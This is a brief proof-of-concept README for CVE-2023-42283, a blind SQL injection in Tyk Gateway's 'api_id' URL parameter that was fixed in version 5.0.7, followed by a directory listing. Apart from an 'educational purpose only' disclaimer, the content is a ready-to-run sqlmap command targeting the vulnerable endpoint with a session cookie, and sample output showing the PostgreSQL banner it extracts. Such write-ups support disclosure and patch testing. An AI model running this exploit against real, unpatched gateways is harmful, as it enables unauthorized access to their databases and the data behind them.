Proof of concept for CVE-2023-42283 in Tyk Gateway# Disclaimer
For educational purpose only!
## Details
Proof of concept for CVE-2023-42283.
Tyk Gateway is vulnerable to SQL injection.
Fixed in 5.0.7 version.
The URL parameter ‘api_id’ of the "https://<YOUR_URL>/api/errors/count/...?res=day&p=...&api_version=...&api_id=<PAYLOAD_HERE>"is vulnerable to Blind SQL injection.
## Exploitation
Use sqlmap with following parameters:
```
python.exe .\sqlmap.py -u "https://<INSERT YOUR URL>/api/errors/count/11/8/2022/13/1/2022?res=day&p=-1&api_version=Non%20Versioned&api_id=1" -p "api_id" --cookie="<INSERT COOKIE HERE>" --banner
```
SQL DB banner is returned in response:
```
...
banner: Postgresql 13.01 on x86_64-pc-linux-gnu
...
```
[4.0K] /data/pocs/36bb0309884697992c428c64d3bfbd964ccaac1b
└── [ 694] README.md
0 directories, 1 file